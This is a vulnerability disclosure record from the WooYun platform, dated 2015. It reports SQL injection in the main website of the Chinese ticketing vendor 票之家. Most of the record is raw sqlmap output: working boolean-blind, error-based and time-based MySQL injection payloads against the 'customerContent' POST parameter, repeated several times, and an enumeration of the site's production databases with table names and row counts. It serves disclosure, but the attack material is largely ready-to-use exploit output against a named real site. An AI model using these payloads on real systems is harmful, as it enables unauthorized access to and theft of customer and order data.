漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0146643
漏洞标题:票之家主站sql注射漏洞一枚
相关厂商:票之家
漏洞作者: 路人甲
提交时间:2015-10-15 10:00
修复时间:2015-12-03 18:02
公开时间:2015-12-03 18:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-15: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开
简要描述:
...
详细说明:
sqlmap identified the following injection point(s) with a total of 666 HTTP(s) requests:
---
Parameter: customerContent (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: contentType=1&customerContent=test' RLIKE (SELECT (CASE WHEN (8442=8442) THEN 0x74657374 ELSE 0x28 END)) AND 'QrKM'='QrKM&customerName=admin&customerMobile=13888888883&customerQQ=&customerEmail=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: contentType=1&customerContent=test' AND (SELECT 1440 FROM(SELECT COUNT(*),CONCAT(0x7162767871,(SELECT (ELT(1440=1440,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PQsE'='PQsE&customerName=admin&customerMobile=13888888883&customerQQ=&customerEmail=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: contentType=1&customerContent=test' AND (SELECT * FROM (SELECT(SLEEP(5)))PUCD) AND 'SMrA'='SMrA&customerName=admin&customerMobile=13888888883&customerQQ=&customerEmail=
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: customerContent (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: contentType=1&customerContent=test' RLIKE (SELECT (CASE WHEN (8442=8442) THEN 0x74657374 ELSE 0x28 END)) AND 'QrKM'='QrKM&customerName=admin&customerMobile=13888888883&customerQQ=&customerEmail=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: contentType=1&customerContent=test' AND (SELECT 1440 FROM(SELECT COUNT(*),CONCAT(0x7162767871,(SELECT (ELT(1440=1440,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PQsE'='PQsE&customerName=admin&customerMobile=13888888883&customerQQ=&customerEmail=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: contentType=1&customerContent=test' AND (SELECT * FROM (SELECT(SLEEP(5)))PUCD) AND 'SMrA'='SMrA&customerName=admin&customerMobile=13888888883&customerQQ=&customerEmail=
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0
available databases [6]:
[*] information_schema
[*] pzj_flight
[*] pzj_hotel
[*] pzj_ticket
[*] pzj_tools
[*] test
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: customerContent (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: contentType=1&customerContent=test' RLIKE (SELECT (CASE WHEN (8442=8442) THEN 0x74657374 ELSE 0x28 END)) AND 'QrKM'='QrKM&customerName=admin&customerMobile=13888888883&customerQQ=&customerEmail=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: contentType=1&customerContent=test' AND (SELECT 1440 FROM(SELECT COUNT(*),CONCAT(0x7162767871,(SELECT (ELT(1440=1440,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PQsE'='PQsE&customerName=admin&customerMobile=13888888883&customerQQ=&customerEmail=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: contentType=1&customerContent=test' AND (SELECT * FROM (SELECT(SLEEP(5)))PUCD) AND 'SMrA'='SMrA&customerName=admin&customerMobile=13888888883&customerQQ=&customerEmail=
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0
available databases [6]:
[*] information_schema
[*] pzj_flight
[*] pzj_hotel
[*] pzj_ticket
[*] pzj_tools
[*] test
Database: pzj_tools
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tbl_data_openapilog | 379194 |
| tbl_data_viewlog | 239736 |
| tbl_data_orderlog | 25161 |
| tbl_app_customer | 4500 |
| tbl_app_website | 1601 |
| tbl_app_account | 176 |
| tbl_app_contacts | 3 |
| test3 | 3 |
+---------------------------------------+---------+
Database: pzj_hotel
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| test1 | 1 |
+---------------------------------------+---------+
Database: pzj_flight
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| his_flight | 1921 |
| om_order_log | 1155 |
| bd_rrs_rule | 659 |
| bd_cabin | 532 |
| om_passenger | 530 |
| om_order | 394 |
| his_order | 266 |
| om_pay | 262 |
| bd_airport | 223 |
| om_package_passenger_relation | 166 |
| om_ticket_refund_log | 97 |
| om_guest | 67 |
| om_package | 59 |
| sys_cms | 19 |
| om_refund_passenger_relation | 18 |
| om_ticket_refund | 16 |
| bd_airline_company | 7 |
| om_order_relation | 7 |
| test | 2 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 3085 |
| SESSION_VARIABLES | 374 |
| GLOBAL_STATUS | 370 |
| SESSION_STATUS | 370 |
| GLOBAL_VARIABLES | 363 |
| TABLES | 255 |
| PARTITIONS | 254 |
| STATISTICS | 238 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| KEY_COLUMN_USAGE | 183 |
| TABLE_CONSTRAINTS | 181 |
| PROCESSLIST | 88 |
| SCHEMA_PRIVILEGES | 72 |
| CHARACTER_SETS | 39 |
| PLUGINS | 35 |
| QUERY_RESPONSE_TIME | 14 |
| ENGINES | 9 |
| SCHEMATA | 6 |
| USER_PRIVILEGES | 1 |
| VIEWS | 1 |
+---------------------------------------+---------+
Database: pzj_ticket
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tbl_data_check_record | 7270385 |
| tbl_data_check_record_2 | 2244036 |
| tbl_data_equipment_detail | 2008055 |
| tbl_biz_ticket | 1720345 |
| tbl_data_system_log | 802668 |
| tbl_biz_flow | 400357 |
| tbl_biz_orders | 380326 |
| tbl_rebate_day_statistics | 338918 |
| tbl_biz_guide_orders | 256756 |
| tbl_biz_flow_copy | 250294 |
| tbl_data_operate_log | 240119 |
| tbl_data_bill_record | 202469 |
| om_order | 163453 |
| tbl_biz_ticket_detail | 103377 |
| tbl_biz_trading_record | 36115 |
| tbl_rebate_scene_order | 29939 |
| tbl_data_his_query | 21276 |
| tbl_biz_orders_redun | 20770 |
| tbl_biz_flow_bak | 20018 |
| tbl_data_theater_water | 19682 |
| login_log | 17201 |
| tbl_app_account | 15236 |
| tbl_biz_account | 14969 |
| tbl_biz_bank | 14841 |
| tbl_data_guide | 14284 |
| tbl_rebate_final_weidian_data | 9259 |
| tbl_data_sign_contract | 7690 |
| tbl_data_product_sale | 5848 |
| tbl_biz_order_notice | 3834 |
| tbl_app_account_role | 3786 |
| tbl_data_reseller | 3009 |
| tbl_data_free_voucher | 2845 |
| tbl_biz_ticket_appoint | 2651 |
| tbl_biz_orders_voucher | 1974 |
| tbl_rebate_final_data | 1646 |
| tbl_app_website | 1315 |
| tbl_data_open_product | 1179 |
| tbl_data_water_consumption | 1135 |
| tbl_data_equipment_bind | 999 |
| tbl_biz_ticket_finger | 967 |
| tbl_app_account_navigation | 924 |
| tbl_biz_orders_refund | 916 |
| tbl_biz_account_check | 905 |
| tbl_rebate_weidian_data | 816 |
| tbl_data_price_basic | 807 |
| tbl_data_show_appoint_num | 747 |
| tbl_data_show_appoint_seat | 744 |
| tbl_biz_flow_check | 740 |
| tbl_data_product_child | 673 |
| tbl_rebate_data | 655 |
| tbl_biz_print_record | 650 |
| tbl_data_product | 617 |
| tbl_rebate_final_data_0810 | 614 |
| tbl_data_account_position | 571 |
| tbl_data_price_auth | 533 |
| tbl_data_objwd | 401 |
| tbl_data_reseller_partner | 386 |
| tbl_biz_flow_bak1 | 318 |
| tbl_data_order_remarks | 285 |
| tbl_data_equipment | 254 |
| tbl_data_protocol_unit | 215 |
| tbl_biz_payrecord | 206 |
| tbl_biz_taobao_serialnum | 172 |
| va_sms_detail | 170 |
| tbl_data_standard | 161 |
| tbl_data_reseller_guide | 157 |
| om_feedback | 152 |
| tbl_data_settle_tx_log | 152 |
| tbl_data_supplier_scene | 150 |
| tbl_app_role_menu | 140 |
| tbl_data_position_equipment | 137 |
| fh_role_menu | 125 |
| tbl_app_menu_function | 94 |
| fh_menu_function | 93 |
| tbl_data_system_auditlog | 90 |
| tbl_rebate_day_statistics_copy | 86 |
| tbl_biz_flow_0811 | 83 |
| tbl_data_supplier | 82 |
| fh_role_menu_old | 79 |
| tbl_data_scene | 78 |
| tbl_data_position | 73 |
| fh_menu_function_copy | 72 |
| tbl_data_rebate_rule | 71 |
| tbl_app_permission_resources | 70 |
| tbl_biz_subsidie_setting | 67 |
| tbl_data_id_builder | 60 |
| party_reseller | 58 |
| tbl_data_guide_work | 52 |
| tbl_data_special_voucher | 48 |
| fh_menu_function_old | 47 |
| tbl_data_supplier_contract | 44 |
| help_context | 40 |
| tbl_app_menu_category | 35 |
| tbl_data_from_type | 29 |
| om_schedule | 27 |
| tbl_data_id_generator | 25 |
| tbl_rebate_final_weidian_data_copy | 21 |
| tbl_biz_contacts | 20 |
| tbl_data_fh_scene_id | 18 |
| fh_menu_category | 17 |
| fh_menu_category_old | 16 |
| tbl_biz_authorize_seller | 16 |
| tbl_biz_account_flow | 14 |
| tbl_data_rebate_conditions | 12 |
| tbl_data_verification | 12 |
| tbl_biz_coupon_water | 11 |
| tbl_data_product_appoint | 10 |
| tbl_app_role | 8 |
| tbl_data_show_chart | 6 |
| om_address | 5 |
| sys_cms | 5 |
| om_order_bak | 4 |
| pzj_news | 4 |
| tbl_app_navigation | 4 |
| tbl_biz_orders_bak | 4 |
| tbl_biz_ticket_bak | 4 |
| tbl_biz_trading_record_bak | 4 |
| help_tree | 3 |
| tbl_biz_taobao | 3 |
| tbl_data_store_auth | 3 |
| tbl_data_reseller_link | 2 |
| tbl_data_show_screening | 2 |
| tbl_rebate_final_data_copy | 2 |
| tbl_rebate_ticket_surplus | 2 |
| test2 | 2 |
| va_sms | 2 |
| tbl_appapi_feedback | 1 |
| tbl_data_screening | 1 |
+---------------------------------------+---------+
漏洞证明:
...
修复方案:
...
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2015-10-19 18:00
厂商回复:
CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
最新状态:
暂无